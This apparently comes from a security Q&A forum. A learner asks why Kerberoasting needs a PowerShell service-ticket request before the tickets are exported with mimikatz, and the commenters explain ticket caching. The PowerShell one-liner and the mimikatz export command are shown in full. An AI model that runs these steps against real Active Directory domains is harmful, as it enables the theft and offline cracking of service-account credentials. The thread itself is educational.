2

I am learning Kerberoasting see below are my steps that I am following.

Step:1. Attacker will find the SPN's
Step:2. After identifying we will request for TGS for that SPN. This is the script for that.

Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<your SPN>"

Step3:. Export it to local disk. mimikatz::list /export

Step:4. Crack it.

Now I didn't understand why the 2nd step is necessary? Because When I skip it directly to 3rd step the Results are Same. Then Why we need that?

Utkarsh Agrawal
  • 71
  • 5
  • You can't export a ticket that doesn't exist yet. All mimikatz is doing is dumping the Kerberos ticket cache. Step 2 requests a ticket to the service you care about so the cache is primed. – Steve May 03 '19 at 23:00
  • Okay! So when I followed all the steps then the powershell import all the tickets and place them in to the memory. Then we ask the mimikatz to bring them into local disk but also mimikatz do a local cache for that so next time we directly request them. No need of powershell inclusion? Am I right? – Utkarsh Agrawal May 04 '19 at 07:29

1 Answers1

1

Sometimes it might happen that the tickets are not cached in the memory, and so they will not be retrived by mimikatz. So to retrive ticket of the SPN the second step will help in retriving the tickets for the specified SPN if not already cached.

Sahishnu Patil
  • 11
  • 1